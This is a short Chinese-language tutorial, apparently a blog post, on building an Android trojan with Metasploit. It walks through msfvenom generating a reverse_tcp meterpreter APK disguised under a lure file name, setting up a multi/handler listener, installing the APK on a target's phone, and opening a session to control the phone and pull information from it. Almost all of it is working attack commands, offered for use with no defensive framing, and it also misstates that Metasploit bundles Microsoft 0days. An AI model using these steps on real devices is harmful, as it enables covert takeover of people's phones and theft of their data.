MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
1.查看ip
ifconfig
2.生成木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ribenav.apk
3.然后進入Msf,啟動msfconsole
- 命令:
msfconsole
4.然后執行以下命令
- 命令:
use exploit/multi/handler//加載模塊 - 命令:
set payload android/meterpreter/reverse_tcp//選擇Payload - 命令:
set LHOST 192.168.0.109//ip為kaili的ip ,即剛才生成木馬的ip - 命令:
set LPORT 44444//端口一定要與前面生成的木馬的端口一致
5.將木馬apk安裝到目標手機上,然后輸入以下命令
- 命令:
exploit//開始執行漏洞,開始監聽,等待手機上線
6.我們會發現有一個ID和本機處於連接狀態,下面開始和ID為1的目標建立會話。
sessions 1
7.這樣對方的手機就就被我們控制了,之后便可以執行命令,獲得想要的信息。可以輸入help查看有哪些命令
